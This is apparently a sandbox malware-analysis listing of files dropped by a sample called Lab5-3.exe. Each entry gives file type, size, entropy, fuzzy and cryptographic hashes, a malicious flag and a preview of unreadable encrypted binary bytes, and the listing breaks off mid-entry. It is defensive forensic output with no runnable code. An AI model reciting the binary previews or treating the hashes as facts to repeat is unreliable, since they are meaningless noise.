                                                                                                          Preview:|.-/o....u8.f...b...x.q....M7.#..A."...1.uE..E.)...l..cy....7...].<.E...GcJ?). .K.NF.......~.%...O..F,9.4..)F\.....?....F..D.........=...O....x...|..G..b.,Rrx.H....8,...x.F....g.q......a3...2...7..I"......}....S..)..:cy.X.c<T8.....i.....4~(.....K^...c....`.e-..<V...-..].....F.......-.&..F.C..p.-...n.Q~>m:w.N....S.......l)..T.f.0....E..M]....A....6.A.;%3.........QE.V.............X..L..3V.'G...wB7+Fr.vO....v.\..R...>.at..2...."/.>l..L..6.0..Jti.!7...))...D.........lI:..Y...TF....s..Dwbv]....o.......;.w..*.y..S.1...a.<...R..E..{.X..~J.....-..U4..K..e.W...z..H...Q.^.......].......t..RD..A.w...]...K#.q>.fM.....@5..c....V......Q..m.<...t.k........f...].m..f.O.>..A..Qx.1......2..%...K..PR=.....!k.z.\m.#`.r..yt....o.......~..B..m:.{o...p.[..?f..G.. -...b....x....M7*QKk.v....JI3..w...S"......^X..%K9.....e(X..S.+....'.....j.|Y.^.C..`R.T_/Z.w8...X.5...)bV.E.....l].....^.x5.6.'^..r4...........3....D.....}..o...7K..W.5ZM.Z...''4r.4..M.z;:.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):631634
                                                                                                          Entropy (8bit):7.0756715319679
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:YXBnFmyVrRREksfivAxosK8bOcNbenQSgpcUuRF/J1dIhhZQEa1s:YXBnMyVrRREkGAAWD4
                                                                                                          MD5:F4CD596E6A708D927395CE6E016A284C
                                                                                                          SHA1:49B62C086DECB3886999242E74A473EA626A2233
                                                                                                          SHA-256:0A9CF37325ACCBB1163F003B737A5A1A7253E0B799CCC90D403C6F2B378B63A0
                                                                                                          SHA-512:96197836862555AB21191BBDDB333A8C6EB64C38C3D35AE2350848B58DA1A3A66A64611FF18D4D2B7999AB75799E46FCBDD57537A899F1EF7DCE5A63FC198F0E
                                                                                                          Malicious:false
                                                                                                          Preview:..".^.|....2.lU....(..,..r...[....=.....g....*.1.1Z...$...L-.(.5_...K....,..B.....ptK.....-....N...?.APq....1.e,........5?..QN/..^....6%D.n........@...ds.f"...L}.b!*...MK....H..e.q...e..9...D6N..2r.9.'.E.]..M.'....c.....,*.F8a..Q..M.lZ.]`.r,<.).......fH[.q.m.2..Tv.........yhbu.(.....8...1b...b.}p[@...p .t.a.6W.g.....s.......y9..8(.....e...i).f.!..T..c..)Y...Bq......A.}.>..j.......4....."yV.}..Or.... Q.@:qfx.2.,.......D.Q...?.Eeq.G.r.j...p.Q".....4.....O...y....u.W!....d..H6..$.......jV.(p7.w...*....... .3.6^>.%@.Y.F.............7.[vC..,........3.F.Em-x.8k.G.#....9.........j~=...s.)J........E&......ms....D.(.Z.v...D.2.0{p..1!..TVn...P..>........*<.........<.}..B..4`.6...k.[.&Y.J...Hh^..(.L..mYik.o......=.(.M0n....E.-N....3...m....07.Te.P.....;...e.E.SF.2..x.V.2 ..u..Pk~.y..,.u&..<..+.W.h..C.6.^............\.......\......8..u\7.....3..T.IT..b..~:b.gk..Xa..r.y.E....A....%g.._..=X.x.a......yt.~q.a...w...Y$....R.._..C.q..o........p.J.VL.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5680
                                                                                                          Entropy (8bit):7.969392418773024
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:fRy01HSgWJOFLbvaRd9CQ61RSoMPy+8DcZ+h+wkuBCs3/jdeAGx0uKeY2ElUJ:hygWJ2af9S7S9q+uccgwkz0Ldez0Cb
                                                                                                          MD5:EE524E1E3423BBE89B312C2DB91EF7FE
                                                                                                          SHA1:6CF3D174DC3EF2C6CE313719CBE386425BF1D8B5
                                                                                                          SHA-256:E7411ADCD99C0A2ED05865CB41D41D85A4F35FE7BD7D62335BB508654D5A8EBE
                                                                                                          SHA-512:9005D258802CDEB5CA9DBA2B4839476824D8794B3F51952C65EB731E9F6C886044DC7F093F863210DC6917960B4F2AA3EA52DA8CB65C49DF5AB84DF520693573
                                                                                                          Malicious:false
                                                                                                          Preview:.7..HN(oj.J........'..Od+4.;.I....uZ...J0..U9\.eg.D7.......|q.+C.g.+......].....w......a........ .5Q.%..K.^3.*.@/...`..!...h....7.A@zU.....&.0..lp...tGt.......~|R..'.C.<...iv........g...(.s...".=.=....ue..J.O...7....-...EE .S. .._.6.yR.uc..?....e.~.H.\....D.G5I...........H.k<F.`Z.P.....Q.f.....k:.MU.5..1..i.J.....`E....{...c.....-..Y...yL.DQ'.....t..i..k.1.........J...S.....o.B....|...J..>.)*...<...6..ai...k.>...6a.s.Dd.f.2.....P.$..N.O.@.j......h........[...wH6...<._q..........+..(h...a./r...GO6w.V~q..Sc1b.l*&..)..'n..d..{../.T^1..w]mp..C...aO..jp7-...x..h.......a...~y;Y..W.g..ms..N9{...9..3.P.F[.E.v?.?...\.K..C...VB.<.....W.ai.!.Edi7e..5..s.....cZ.<h\..."^.u...r]....R*..6..M...918.Z...R+h..f..1.R.h.....|.h ..?+.27K{.w....x.>Eyj)X.D.....x...2....N......a."..U...Y...................vhZ..<...>....T..\......c.79F...P..o..t .pB.0f.H...9..d+W..D.k...h~p%..j.?.....m...p..)...P..V../6.f..q....6..7{.......~&D..Mb...5-v..;..[2S.\sJn.D*[.n..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2224
                                                                                                          Entropy (8bit):7.911776229516694
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:RiK5TrVAjGDthyHfUTid3hBaUoSGFcmeykEdEElU92i:b5tAKtGx0uKeY2ElUJ
                                                                                                          MD5:4EEEA2ACC3F2521533A2AFD84299DD06
                                                                                                          SHA1:7B2F1FF33F841A19FD8A21F3A6516AB29D638F11
                                                                                                          SHA-256:F34E695EB54773D3CED7E7D283C30DA887A559DD423B12BEAD70C6EA4E72350B
                                                                                                          SHA-512:D18C829552E341B662F58CBB8C3197525958F1DCCA29DCC598A7668128FAE23B8052719A479CDEDF44C4B070D5D44369EF27222F344EE945253AE975D548234E
                                                                                                          Malicious:false
                                                                                                          Preview:.B....D.Ve...V...T,l..#O...l....J'......C..b.3.......%.*P.<..~.....~..vW...V.].z....eInH{.V..uvs...Oe.t.3...h8R.dHbn.....`......c..(..[.$v.c..CkH..{....'...LH.h.Cj..EY....T..`\....x."..c......gl++.Wd.~.mK...i..._I;.T.l.u..v.....z..f.Y..v2CN.':.3.l.:B...7wn...=6......O...D...*$...:.@.PS...Jh.=0...V.....;....).T..4.#.....k.S4..#..P....Ei.>.9V.,..e.3..3r#...-o..f....3B...)/$..|......[.W........1.|..-.E.......'.....<..^.....}.0...2..=.uG.*;..J..-y].......1.........".w[..T.9.P.......|G.xK..hq!..[.8x?..)wv.Z.+.*..J'[!...J_.8j....M.{b...l.N.3..)~.....\D.7}..6..G..Jbi..*.Y..".K..xW..C.1.Q"Rs....V......@.u..+....0...x..x........[..H.......)..8e.X...8....V}.........G...Y....kd...7B...O........G;..e1*q..B.....K:..V..#`....fgH.W..7R....i`C.`}....&u...g<....^..z/.CT<>....e}...{^. .7Ef.6..@.....!..X....d|:..&x:.......Q.....iNx ?pk...}.[..........b..=.i.W[...q.\_;..J..&...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):8992
                                                                                                          Entropy (8bit):7.980235069365126
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:SspUdxYYYfHSY2xwuKYChl229wnMvzTK0Cb:SspUbYYcHSY2xTKYxkHKtb
                                                                                                          MD5:E3A8ADC22101CE9CDCF1AFED87000260
                                                                                                          SHA1:163E6FB1A0AF1DB9EAB847DBA33669C0A6782EE2
                                                                                                          SHA-256:E1ACAA8DDD484E69758CE544C104C2338F7C582DA9DB260D7E814CDD204D5ABE
                                                                                                          SHA-512:0EB1192E7FB4310DCDF1BFD748D63C16CEE7FF380BC5D84785A65852B6698152CC8DBD06169C941B63F3810A1C8D32C7C21829061B7A59B10154CEADA837996A
                                                                                                          Malicious:false
                                                                                                          Preview:..L!...z...@.p)=......,.k.D..#I.....(.&.7.....h..w.....l..C..h.-..Ne'.........A*.h.....keR~.As...UO.I...wi....eP..r]&.n......;_UQ.D7....QR..Hx.....b.6<......_..@|U.$..a.zoy8.1I...I..g.../..3.....F."......H........4u..Z.=..].@....AK.UD9U.<..c.peK.u...zLS~C.U&..k|....f.. .E..."..........33r.]n..g..R....:.-......&.Cq...P+.=.......?9r..F..eM&H`...?.L.S|.yon+N....G}3..:......Z....}..t8.)!O.g.h.f%)..........h.{t..p....WZ.].N.%wv..>.'D...s...:.i...?.N$.6....$....~NN.......,......w.......].I.p....+S./S.....x....Wp.bK..g.....aG.....d..-.z.';..m2Y.en......U{...}.n.>3f.....h.T.D[...V....;..J..".e...X.r#...x,...T.n&\...Z..9.dh5^.hX..g...!..X.H.#...h%.U8._.0.]MY..vF.7....W.....m....?...6..^..U...fp.T>"....l.3...Y..a.......Wm^......5...M.$..BR..r^..W..Yj.....vX...<.`..;.iS.T......._.....r^.}.2........t#|_..=....r....M.....d].....Wc.",...R......@.Sh.]21.B.[.*..{.....+..+..?.........q..+.XV.*Z?M..y.=......"p2.R..}..b.my..-..U.*.....T.i$.....l.|F.e.,
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5264
                                                                                                          Entropy (8bit):7.965324776082819
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:2Rk2ypO9fDkVojN1Ssq2ATYt76jdB3g/pGx0uKeY2ElUJ:2R5lmeNk5a7gdB3ES0Cb
                                                                                                          MD5:A0533FC04709AE06E34EA6FF2A7B8EAF
                                                                                                          SHA1:C2AE9EB044DFA088A3A60551C073D8EB04C79954
                                                                                                          SHA-256:D3FA4B951FD5E9321805D887695CA5BCB6B6F18F0C0080B4D9D6483860DFE63D
                                                                                                          SHA-512:87A0B9395C4CA44E4336AA0974566398CD2C340E83E55399B186C2288CDEECF435F94B400CCB655C9C30395FED58274C064307C3D0991E4CD326459717934D4F
                                                                                                          Malicious:false
                                                                                                          Preview:.....GG...O.1.....E.^..o.k........NUa...r....vA\r.V..kskO...p..lNY.I.B..r.1+...]`W9d*..T........6d....z......C$Z.b........UB...Y.I..37.y`K....>.......u...Tk*..v..p.....5.G.......O^....>+C..q'~.Y.e..!G...X.T...g#f.Uy..X......T....#..~.L.J....)./.)_)....3.(P"1.i.p...M...6.....<.a.z#.}....ed..&.r)......|.tR..>.~.%.8...5..$,Z#..XZM<c..fz...A.....O.F2>..n./Z..."..v..>.U...\.K..=....E!....A...(.t..?....n_....F..UG.ir........'..W..B..rs.N.b>...L...........bk.w.H..?..... ...>.E..Pd...d..N.G..L..U..<'^...7a..V..~....*u..c..v..>...Qd#?>.<... .Y...K.k.)e....2i.j.%.v@0.%.....p.J7p^>..ZX.U...JL...YAa...:Y..N...._...F....fN...f[.O&.Q.u.....m...yS....b....4/...v....c.m..+.x.*>./.G._Fh:Y.w....{._.Miq.D.[....C.e...p.....y...-k...`...xX....KI.6....K...h.0*+T`..-f>$E..+.E..F.To 9G.......C....34...k.....U.s@8..\....(..g..8o#[..Q3..?...B3...t.#.o..6....7.%c}"..&`.d@..."..:iS...y.M..b.d..#.....d.....:I.9].?.k .....O..`...+\.....".K....D........
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3088
                                                                                                          Entropy (8bit):7.938925852851924
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:mRdr9eZhDkKDbM7yNf4i9RfsOGx0uKeY2ElUJ:mvrARDbM7+Fkd0Cb
                                                                                                          MD5:9AD9DDF38CB25D8D69C70CCFEF34BD54
                                                                                                          SHA1:49C53E4870CCE6141046364D6606770C8490C94D
                                                                                                          SHA-256:1D3E728CE3D7784300153629113FF31B625C77811256510EB2DA89558FD68392
                                                                                                          SHA-512:36896A7A787AB9D030C5B9C272368D88B195983BE6CFDBAB67A6A914C575D6C8F1447B44E91C2987D65016EE6082B464E999ABA5839AAEC203B78756AC59E046
                                                                                                          Malicious:false
                                                                                                          Preview:..k2mr(.......F..1._.dM.M.....x`.....[Hp..^....D.......Mk..N.>.x'.s..W.Sy...4J..i..&.*>..&...H.....f..-..c..N...._...rQ...........v*;.....I:........ZH..U|..2.Gq...{.%....A8.L........V..<,.WlH.Q....Qt...4.?1.qo.(...B.......Q.w..w..a..$............L/....F....W......z.3...z...9....)X..^..4U....N..o......nT.W|/>...L.Y.T...H..U..1.B...3UX"..?..t.Ke4.=i...f...@.......QM/...P-.#.0...P.....'Z...........X.Y^..JF)ZmLHl....p..<-+.q.U..T.w<.........k....Wr.`.U5^...}F%K........C)...|3.j.Yn.|...4W.G..3..!{.)..C..a9.D....`..G..VCW..l=^...HQG.Fh..e.'.bz.b..}".t.T!.......Ke....3..i..../6...-.#~...Zp.....f../......Tn.$.&1N.....|....p..cU.v...H.G.D.Umu..z.R....R.....p|.....DS...mfK..S..B1..E..V{SB.tXG..Q..+.N..L.."w..t..g...W......H~uJ.K...-...?...CF*...Wr/.y../m..g.".].>|....g.skM...G*...*Sy#^.e...8H.4..".<,QA...:5....t.....g...4...Qj.+.u.?.u.]..@d+.{Y..k...#..P.a...<..l/Y.@T..E)..:...-...RHCi...z.Fw....J.l......#....a....K..6.]g...g..B.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2688
                                                                                                          Entropy (8bit):7.924490111300437
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:1E5ngiqxUhEyFHVeTNfIPUDP/KtX5zolHfUTid3hBaUoSGFcmeykEdEElU92i:u50G+ytqePAP/KtX5JGx0uKeY2ElUJ
                                                                                                          MD5:4A32C221F0A29E0F351080CC9BDB3D46
                                                                                                          SHA1:9B13222FCD234D40884D65B3BF2B6F02402BF38C
                                                                                                          SHA-256:851B7FAF53076365C8639C72EB53908AC5802E02084C83099E4CE5F62B02621F
                                                                                                          SHA-512:2BBF3260C503CD818A8616C8DB0A4310A46DB4960BB93A5ECA27511E34169F43F97B12B99A15877E9E9ABFBDFC5572D4B65F68847DAD908833FC4F4F2BCC3BF0
                                                                                                          Malicious:false
                                                                                                          Preview:m...Zd.>......&9...\..r.y.....G.eB.6-..Ao..s(.O.^..h.@....LM66...e..?Vr.'-T.g\.cdQA.%~z.`.tI...0..hn.)...PB....*k..-C8..'.^:.._3B.I.A.0.......O....9..c.(...O#2....._#..!-.;6.3!..:.2.\Z.V.w.53I=#...|.D....I.s5!..^N.6Y..w..,...x..cR......Y...9.....;.'..W_v..i..<.!O.l..W..F.n.....Kb..\....;Dh....5...N..P. ...eK.VU...5O...@.h;.2.[A..G.x~....4....y.h...B.....v...T....U.`]..~..B..;.-B([.F>.8...8=..sr..!...4....B.d..5g.u.d.E.I..C.]...../..."9......i..~.:...y..Mv..|........N..z.4[..,z...H.myC.....q......VOx.ug..A<#i`...`.%...x.w.|e..W?../M...G....&k).>......L.'..5..{.....9(.){~j....Op.i....U..J}%.}S.......hN..2.8D.!...\./4.u..#..q ........C..&6...1.r....P(...b._.=}...!.?........_...ENtu.....Hv..a..vl..}.og.I.n.M.....]~...'.7.g....gg...O.;,<+cdJo.x.j..l..X3...o,.T....s>J.-..:,.......\b.+.c....Q...N.KT...1d.Q..;w}.{m'...l..9..>$@.*T..|.U.y..b.N.m.mTo......s.N.C...9....F..../...sYS.([5.G...(A.Q...$`...lj....5t..e.M.W].!-L.6\.aJ.x..[}4......(..T.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2000
                                                                                                          Entropy (8bit):7.901377482460589
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:s+lUrVGhBqFKRzHfUTid3hBaUoSGFcmeykEdEElU92i:s+lUrVQPRAGx0uKeY2ElUJ
                                                                                                          MD5:F2DEBB12A5F2372350E3CB9C0A813126
                                                                                                          SHA1:FEF146AE93A61A3566526EB3409F8F3FE442667A
                                                                                                          SHA-256:46790D4EDB7545B7E17AD8DEC6E373CC9AE9340536C94A08D2481C756E1C74E5
                                                                                                          SHA-512:6D9639656D42405431F79C648B56AEF2368F2324459B51CD302658BDD80C00696B04828A19A84C495E7E3CF31F62BF99831B814912D70395C71008A7001F835F
                                                                                                          Malicious:false
                                                                                                          Preview:zC....F..........Ha3%....ZF..y`~s{C.;J{.M0..B.;..!..xo........9.4.2.......0! c.oN{.........9Eq....q.y.sY.8.. Vi.@.D...'Bs5.....*-.....oh....t.W=mA.....f..'R?....|. ....&..R.f..?{.}.U..<...@..tG......1>q[.eP..,j]...,.#g.....\.9..\......H...V.q{W.6k..n..?...6.:y.,Q.Y..gX........NX..f.4.._..}.U....t.....g.4.Mq.uv.".(.l-....n.....M.D..fb....!I.4.G.o...V.C.....5.<.b....'7..3.I.....+-.@.u....?..c.Q.QO.Vs9|....xU......(.tG....+...#| C.I..L..t...0+y....E+...h7.Q\5p14..@{...w...R.N?.... GP'r+@qw=..?A.,......#.g(.c.n..Q.!.Qe.....h.t.2m.........k.9.LK.......f!k3q>.x\...V.....1..I^......B..-...L..n..3.....J...VY&............l..:..r...n.1~sT."..:.S.:..>..d.o.0..0.B%..Q..7..6.."h....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:zlib compressed data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2224
                                                                                                          Entropy (8bit):7.921377897269392
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:d1ymxIBbOWHfUTid3hBaUoSGFcmeykEdEElU92i:d1fI+Gx0uKeY2ElUJ
                                                                                                          MD5:4E056C1DD41949B34F9DB78D5660D8A2
                                                                                                          SHA1:002E049128DCEDC991C3AFC8B5CA90A60A3AF397
                                                                                                          SHA-256:C65E4FAC1BDB5920FF6EF1A0FA125C164F012B44B5C4F0D429A3EE3BF4B8052A
                                                                                                          SHA-512:0E25BE8CE20E44387281EC61C2FDB6B04321398215819D6981FCFFF8EA69CF3DCF88AD7285B40EF2F444BA8A16E4CB8FC57856760991704C1D1D7F66A51F61F4
                                                                                                          Malicious:false
                                                                                                          Preview:(4.....V.=..2.r..;z..Om..>..+.....h..dx.......I..j#.Q....]./t..P..P.9..:../..$......".6z.V..........w..+..'@.dy.....s..2jF....<.x..A.H.\...*......{.....jk{..*..O.g....7E..;..+."..S.y..'.".9....s8.~+.._&...Os.3Q.?............Z...O.CQ...=1+..b3...o......;tb.Z`. ..qD....3...G...*.Uk......Ig.....<<t..Q.}.*.Be...v....[9S./>...i.G.,b........:.. .p..KH.a..*M.......F.~X .(G-......Rz...Kzw...Q.J.{.Y... .9~.l...#.C=..CeV..<.) ....fg..s{..\.y..1.a.[F...&...5V..^.2...v..jJX.r. ......k:....W...1.FW.|e.v.iZDA.}.U.'..c..a'..k.*......}.&;.Y...<...^'..............\#........hP@J.X.."...Q.q.$.a.........Q.Rs.B...(.)f........O.0...l..l.].w.<.;...F./....vi.&..|.*.&...+?.lQ.y.H..h_/x..8..~".m.! +..a.....?NX.;~.!8.%.oTf...a.... ....%b..L9..F.~..i...l...S...{.(..2G..`~A..{.F..].8...*...@.Fo,....O..~Y~.=.O...%..K..O...!_t8u....7S.Yl......c..+...Ww..U...0b...-w.T ...cP...V.G.+..2....\;...z@.L......]0.s..w....vd....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4960
                                                                                                          Entropy (8bit):7.96340224372245
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:So2vcuvtYqLoYjG4I5q9WYe81FKUGrnmAOg0Coc+faGx0uKeY2ElUJ:r2vculoYjO5qvKUWm80CwfJ0Cb
                                                                                                          MD5:04FA46206609BFB473DA97CF4A686B18
                                                                                                          SHA1:57703FBD3D4AD5AD32BFA1E35CFC117838EBD438
                                                                                                          SHA-256:23558A757A5AC2FBC2749CD96208B97B27934942AD9F3E2583829B0D2CD18589
                                                                                                          SHA-512:264271442AFE6A817B4930D31623E39C7F289624AD9EACD3ECA75BA2541F66D303463A07073D3133301E770A641180CC67CCE06AE371A254F39662A16666ED19
                                                                                                          Malicious:false
                                                                                                          Preview:...'.. 9o.p.l.&D...S...H.|..7.|K..D..x_...Ot'.@..&..P).M...).....p.&..j.._d..N...#\.;....=j3.!...tT..Dmt.W..Bg...%.Y..CJ...(yA...H?..f...]....q.\.[....d...B...Y9.:r;.n...f.F..].Z....i..Lh.u....#.a..j)I.=..~7IzUQA.....1..r..?..P,.$....s.....[.G3i...75...!#...n..4?@.qxd....\#...$#...*6.c;....mr..LX...u........;i E.@...Zk.~..=....`*...-(7.t?........'g."}#...&>......[....&.KKC..W].....=#lo61D.|.."..c.O.H..3.....w....}e.i.I.....+....>&....?......%O.........j..y............g.g.<@.qV.2.. ..W{.B.No.k..weR.<y|.$G]e...=')...^#Q...m.u'J..A.l..S..Y.p,.#c0hL..#).r...Y.....5D...N.o.4.m._%a0.W....T.L...V..C}..c...?.-.?/..AU..t..._..ND.[....$.:.C9.zz....s....+{..8]b...(..x*M~.j.,q...(B..S.#?|/...L24. .g-.3.(g[ Q....x....l...+.1.X.|H.!..L....8...B.z..Xx.W.p.....h..o..."...(.L...qj.RHoae%.f.....V.8v>..:=6.#.............p*g}.(...G.=7.J.q...u.;..Jpsbt{...{.....V@...]2,.!n.jdI./.....&rk.x..*..m.....a...A.;.vb.T.....%.....r....I.V..P7VRC.^..K.yTh:.5....+.T.....|...9B.. .
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Secret Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4560
                                                                                                          Entropy (8bit):7.957813658500009
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:TaSZD2iaDOgknQSZAwoUUqhd70kWpqislwGx0uKeY2ElUJ:FZD2iKnUQS6wo/m0klD0Cb
                                                                                                          MD5:227BC79C331BF026C9D32C8AB4109917
                                                                                                          SHA1:FDC2D675527FCF75688DE85B429C45486DABEE61
                                                                                                          SHA-256:141D57F5CFCEC990D247B3A36F7BA732FE24A5813C4016EB9D0503204A3157A2
                                                                                                          SHA-512:FA9DF6B5A5B59E64F8023B14485A9DAD2AF94BBE628F9731F9530FBFD2C5652D86D8CC894E2362E5560D74F10EEC447ADE142E0659E2E96AEB64D0AC6663A88B
                                                                                                          Malicious:false
                                                                                                          Preview:..97.C.Nt.L.v.j{?S&.9s.J......V.....X..HHTh.G.gC..p.H?....EG.....8w..|..;........F.:`o|.M4l.,H.....|[j......[}.bn.*....n...>...n........?w.....^...g.y............E.(~6..7.3yK^..j><.....T.|......g....p[........,p.(T...s..R...ZD`o..k8|....?F..|o.b.*.:....f>...]s_.F]LP....E=...^8...#...iA...d......`.<*.3.....C3O..sy.:^...K.../....i.E.P0.v..K...&d..@...S\..CW`..".-..(...2.......!L.,.#.F.Qy....K.;..U.t...t.P.....z..B.<k:.#J...L3].5q.O..R.;.e...e6.1.=E..&..M.M..p....I...y~..cJsxB.K_...Y..huTR.E.2LQ.>.@c...............6{p...x.!9~u..y...x.....o..8...8R+..n..<0.....L.5....>.....5..p....N.".t)...a..B...>74.U.d.c...t..;-.V........s.CpszR.u.?...p..-V..i}.+..U^..;...BX"..7...w........g .....M/..J(7..st..Z,...Y.V.0EJ|......X.y.#s.@\.u....=8>@m...........H..O...xi....5....].<Q.h..*!4te.7^.......-*.K(,./..`tc...T...._...E.eC.s.K......0.`...........OH......Q.<....9...6O..C.;.....J.e......C.8....e..)..V.U.....*..B%..-...'.....|.hy.*..'B?E..PO6....4.....B
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2368
                                                                                                          Entropy (8bit):7.916074077453715
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:q72Qk/JVHnvP5b4HfUTid3hBaUoSGFcmeykEdEElU92i:+6JfGx0uKeY2ElUJ
                                                                                                          MD5:541B9C719F51D35DF3AE7ABDE44A8BFA
                                                                                                          SHA1:C7447021881373DFDAEDC7E371B4487F9118F385
                                                                                                          SHA-256:01FEB67864B53C59270EABE5C4C5ABE5D9B1790E7AE98E5073C906D42E83888B
                                                                                                          SHA-512:7864FBDCEC72299360E33F6F12A49BCD68D128F70A25F876258798BF7C3B1ECD9545E14A570BFAC9C0EA932518CD0C2B00635CE6168AFB1640BD5E852F19FB4D
                                                                                                          Malicious:false
                                                                                                          Preview:..[Kv...{cz..j'Uz@.N..g.M...1t.4.?.......B3...G(.c.....5..#.8\.....&..$.....P.2.x....HA.I..1;!.g._ .p..Ch..n..4....7.t\.BibG..G...z."L...[....{..r.PQ{.]..3.`..J.e...x.....9:.ow.^+Tz.x..#).s.6....:`..H\.H9..m..[.)j`......U`....a.#...U.....(PFk~...e..M..t-.2ml..7.(3....z..0......D.....t.`jJ.0.v.....[.{.X/..J..w..'.SF...9.J....#w..-/....:uFh~......C.D.R2.D...Yk.~......T..DT...4._.1K..*..X.....D..N.<.z.......K . du..R..i$...Wd..>r.vC..:.Sv..JG.sk..bz(..#.#.)N.<.r....]..>kfc.....#.}e{...PtM.1..E.F.nv...S^.j.H.E.Tm..Y.s.......>....0......|[.^.W.Z...-.. ..9.0.Q...1.*]..h.-...n.(.l....O..M..;&%5..1...ep....*.-v....(r...Zig......)>.s..A...t..I.b.b(Q.u..D.X.UF*.....>co...p. ....R..%.X...$k.B...{.b..3.%F.E.`.g.J....qF..o.N..&.:i..Wb.P.....qutb...xV..a.}.K.@M.9c..........|...h.b......5}g.<l.......p.Lc...>;Y....>K.E_.nUwL.+..H..q)...o. Y..h.s.....x(isI......^....#3G.(.....#&z..=.|.d.U&..Ds...6V.Q,.-M^..A.`.S.@,J'....w00]w?%g..!'..Wp(@..R.D.?.3.e.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):37152
                                                                                                          Entropy (8bit):7.995009670396298
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:MDlyeaiifhxuZxbEJmeizPJh5AkHBnwV0cHxg27Vkc5nDdvvmZ:pWGJ9sPJhrBq0KgkkczeZ
                                                                                                          MD5:7D803E379327BDAD30803D75475C1786
                                                                                                          SHA1:97582A3A7F8680FC06AE93CC86A53EDBA9F8DB1C
                                                                                                          SHA-256:21ED168F8677AB70894F66886A1F7BA35417D9D8BD81279370990507312346CF
                                                                                                          SHA-512:B75655D1002A19BA0B328C0AEFE5E8FCB1E8964FBC32EB1135853827A352A9E1529FBE8557F78DA72E16E321CDC87D0E249A426EB5EB447383E9739D23F662E5
                                                                                                          Malicious:true
                                                                                                          Preview:...g......C..O..}.9.%Y./....^.D..:..t..K/6.2*....m...Pb.....->>.7...-....oZ..M..RF....Y..l...G.-.#.\....G9...[.O...wg&BK.>.....l._H.?....M..-......p..wo..<............yU...=<&.~.`U4\....O...X..d.......i.|.....:..^.m.....eF.g....-...YK......\JHn&..`).I...c...z|.}.M.....].Yap.v.|.........^!.lh.&.Sv^.U..D..Ch..Q..o.o..[....,..3[....M.`F....]+..:kX5..+..+..S.@..j..cj...y.>{c......vx7?..j..9$...I....y.......-.T...gmh..$.q....~.......5z..h...../r..x..FI._..j.....B.K..d..2w,S7....%.q>...95..j....]...zm.n#"..F).DHSGv|a?m..Bi.....z7.D..`..~..BQ.v>...k.R....E...i..Y.......op.~...K.j.u....+.9b./......6...\y.d.....M.y'..p;....2rW.{.........~~....;vZ....lq...U.......f.'.'...>P2..........5$....-\.Xl7|....U.../l.e.4W...*...r."U..D..VM.&..-x>.~..;J.t/.....5...@K5.N....y.!X.W'R.F.e.D....II .(b.$.._.....F$.....+..K.......z....B..{Z..5..8.W...[2..tn._.K.....I.z.....2.[$Kx...<k...../4!J"....;.O......\....;..F...!Q).....!.(XI]....S..FA(X!.(..14..;$B...R......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2752
                                                                                                          Entropy (8bit):7.940221291656655
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:g8S3vcm/4hYffvCrOBYVcfG/AHfUTid3hBaUoSGFcmeykEdEElU92i:g8Sfj4hwf0OBu/HGx0uKeY2ElUJ
                                                                                                          MD5:C5FEA0FE81C0A3B7F1E06360A43D931B
                                                                                                          SHA1:AFE17A5AD31817152581D2F46534F4FF1004FCA7
                                                                                                          SHA-256:02AAB238D8B271955BE2DA2A01324FE38314D36879E3FA9F1CBCF5BC3A8F7CD2
